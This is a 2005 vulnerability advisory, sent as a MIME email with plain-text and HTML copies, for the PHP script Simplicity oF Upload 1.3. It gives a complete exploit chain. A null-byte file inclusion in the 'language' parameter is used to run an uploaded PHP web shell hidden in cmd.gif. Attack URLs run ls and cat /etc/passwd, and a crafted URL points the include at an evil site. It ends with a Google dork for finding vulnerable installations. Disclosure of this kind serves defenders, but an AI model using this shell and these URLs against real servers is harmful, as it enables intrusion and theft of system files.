--------------Boundary-00=_B6O8YHI1VA4000000000 Content-Type: Text/Plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable 26/07/2005 16.09.18=0D =0D Simplicity OF Upload 1.3 (possibly prior versons) remote code execution =0D & cross site scripting=0D =0D software: =0D author site: http://www.phpsimplicity.com/scripts.php?id=3D3=0D =0D =0D remote commands execution:=0D =0D problem at line 25-30: =0D =2E..=0D //check for language overriding..=0D if (isset($_GET['language']))=0D $language =3D strtolower($_GET['language']);=0D =0D //now we include the language file=0D require_once("$language.lng");=0D =2E..=0D =0D you can include whatever adding a null byte to "language" parameter value= :=0D =0D example:=0D http://localhost:30/simply/download.php?language=3Dupload.php%00=0D =0D you will see upload & download page together :)=0D =0D so you can upload a cmd.gif (when you upload a .php file, usually it is=0D renamed to .html...) file with this php code inside to execute=0D commands:=0D =0D =0D =0D then try this url:=0D =0D http://[target]/[path]/download.php?language=3Dcmd.gif%00&command=3Dls=0D =0D to list directories=0D =0D http://[target]/[path]/download.php?language=3Dcmd gif%00&command=3Dcat%20/etc/passwd=0D =0D to show /etc/passwd file=0D =0D cross site scripting:=0D =0D also, a remote user can supply a specially crafted URL to redirect other people=0D to an evil page:=0D =0D http://[target]/[path]/download php?language=3Dhttp://[evil_site]/[evil_page]%00=0D =0D =0D =0D googledork:=0D =0D "Powered By: Simplicity oF Upload"=0D =0D =0D rgod=0D email: rgod[at]autistici.org=0D site: http://rgod.altervista.org=0D original advisory: http://rgod.altervista.org/simply.html --------------Boundary-00=_B6O8YHI1VA4000000000 Content-Type: Text/HTML; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable 
26/07/2005 16.09.18

Simplicity OF Upload 1.3 (possibly prior versons) remote code execution=20
& cross site scripting

software:=20
author site: http://www.phpsimplicity.com/scripts.php?id=3D3


remote commands execution:

problem at line 25-30:=20
=2E..
//check for language overriding..
if (isset($_GET['language']))
   $language =3D strtolower($_GET['language']);

//now we include the language file
require_once("$language.lng");
=2E..

you can include whatever adding a null byte to "language" parameter value=
:

example:
http://localhost:30/simply/download.php?language=3Dupload.php%00

you will see upload & download page together :)

so you can upload a cmd.gif (when you upload a .php file, usually it is
renamed to .html...)  file with this php code inside to execute
commands:

<?php

system($HTTP_GET_VARS[command]);

?>

then try this url:

http://[target]/[path]/download.php?language=3Dcmd.gif%00&command=3Dl=
s

to list directories

http://[target]/[path]/download.php?language=3Dcmd.gif%00&command=3Dc=
at%20/etc/passwd

to show /etc/passwd file

cross site scripting:

also, a remote user can supply a specially crafted URL to redirect other =
people
to an evil page:

http://[target]/[path]/download.php?language=3Dhttp://[evil_site]/[evil_p=
age]%00



googledork:

"Powered By: Simplicity oF Upload"


rgod
email: rgod[at]autistici.org
site: http://rgod.altervis=
ta.org
original advisory: http://rgod.altervista.org/simply.html
_______= ______________________________________________________________
 <= B>FREE Emoticons for your email! Click Here!     &= nbsp;           &n= bsp;           &nb= sp;           --------------Boundary-00=_B6O8YHI1VA4000000000--